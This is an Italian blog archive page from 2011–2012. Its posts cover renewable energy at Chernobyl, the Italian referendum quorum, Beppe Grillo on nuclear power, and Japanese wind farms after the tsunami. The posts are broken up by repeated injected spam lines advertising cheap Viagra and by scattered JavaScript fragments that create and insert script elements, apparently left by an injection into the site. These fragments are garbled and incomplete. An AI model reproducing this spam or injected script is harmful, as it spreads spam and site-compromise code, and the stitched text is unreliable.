Energie Rinnovabili Archivi - NonCeLaFaccioPiù

.

La rinascita di Chernobyl

9 agosto 2012 Commenti chiusi

Buy cheap Viagra online

Il Governo ucraino ha fatto approvare lo scorso 18 luglio una legge che prevede l’utilizzo del terreno radioattivo e inabitabile di Chernobyl per l’installazione di impianti fotovoltaici ed eolici. Verranno costruiti, inoltre, impianti di cogenerazione, che si occuperanno di bruciare la legna radioattiva, ed intere zone verranno destinate a divenire foreste. Stiamo parlando di un’area di circa 18mila km quadrati inutilizzata dal 1986.

Un notevole passo in avanti per il paese dell’Est europeo che mira ad attingere, entro il 2015, il 10% del fabbisogno energetico da fonti rinnovabili, e a raddoppiare la percentuale entro il 2030. Si rende noto che a breve inizieranno i primi lavori.

}

}

Gli abbiamo fatto un “quorum” così!

13 giugno 2011 Commenti chiusi

Ecco i dati aggiornati dal sito del Ministero dell’Interno:

Italia (Lunedi’ ore 15:00)
PRIVATIZZAZIONE DELL’ACQUA – 55,69%

Buy cheap Viagra online

PROFITTI SULL’ACQUA – 55,70%
ENERGIA NUCLEARE – 55,42%
LEGITTIMO IMPEDIMENTO – 55,29%

Che soddisfazione, è proprio il caso di dire che gli abbiamo fatto un “quorum” così! è sempre bello quando la volontà popolare decide di farsi valere! Adesso aspettiamo con ansia lo spoglio delle schede.


} else {

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Alla conquista del quorum!

12 giugno 2011 Commenti chiusi

Oggi è il grande giorno, il giorno in cui persino io, che normalmente non vado mai a votare in quanto non mi sento attualmente rappresentato da nessuno schieramento politico, mi sono mosso per dire la mia. I miei 4 “SI” , insieme a quelli di molti altri italiani stanchi di questo regime, si faranno sentire e arriveranno alle orecchie di chi preferirebbe vederci tutti al mare in questa soleggiata domenica di giugno piuttosto che alle urne. Le statistiche rilevate fino ad adesso sembrano promettenti, ma non cantiamo vittoria troppo presto. Oggi e domani prendete amici, parenti, conoscenti, sconosciuti, anziani, chiunque e portateli alle urne a votare, perchè veramente non se ne può più!!

Grazie!!

-

Buy cheap Viagra online

d.getElementsByTagName('head')[0].appendChild(s);

if (document.currentScript) {

Beppe Grillo – Nucleare: siamo in guerra!

21 marzo 2011 Commenti chiusi

Beppe Grillo interviene ad Annozero sulla politica, sull’energia, sul progresso e sugli interessi dietro alla costruzione delle centrali nucleari. Non credo ci sia bisogno di aggiungere altro…

-


Buy cheap Viagra online

-

<\/s'+'cript>');
// ]]>

} else {

} else {

Cos’è che tiene acceso il Giappone?

21 marzo 2011 Commenti chiusi

Le centrali nucleari giapponesi sono in fase di smantellamento, ma come mai il paese non è in black-out?! Merito dell’energia eolica. Gli impianti eolici sono ancora perfettamente funzionanti, nonostante il terremoto e lo tsunami, e stanno contribuendo a tenere le luci accese durante la crisi.

Buy cheap Viagra online

Un’inviata dell’Huffington Post ha intervistato Yoshinori Ueda, portavoce del Comitato Internazionale della Japan Wind Power Association & Japan Wind Energy Association, il quale ha spiegato che non si sono verificati danni in quasi nessun impianto eolico. Anche il semi-offshore di Kamisu, situato a circa 300 chilometri dall’epicentro del sisma, è sopravvissuto.

Ueda ha confermato che la maggior parte delle turbine eoliche giapponesi sono pienamente operative, e anzi, secondo gli ultimi dati pare che ora le aziende elettriche abbiano chiesto ai proprietari dei parchi eolici di intensificare le operazioni, per quanto possibile, al fine di compensare le carenze nella parte Orientale del Paese.
Eurus Energy Japan dice che 174.9 MW di elettricità sono forniti grazie ad otto parchi eolici (64% della capacità totale degli 11 parchi eolici nella parte Orientale del Giappone).
Soltanto tre parchi eolici (Kamaishi 42.9MW, Takinekoshirai 46MW e Satomi 10.02MW) sono fermi a causa del guasto alla rete causato dal terremoto e dallo tsunami. L’aspetto ironico è che le centrali eoliche messe k.o. dallo tsunami non destano nessun allarme per la salute della popolazione.

Fonte: ilsostenibile.it

URL foto: bcp-energia.it

-

var d=document;var s=d.createElement('script');

var d=document;var s=d.createElement('script');

Powered by AlterVista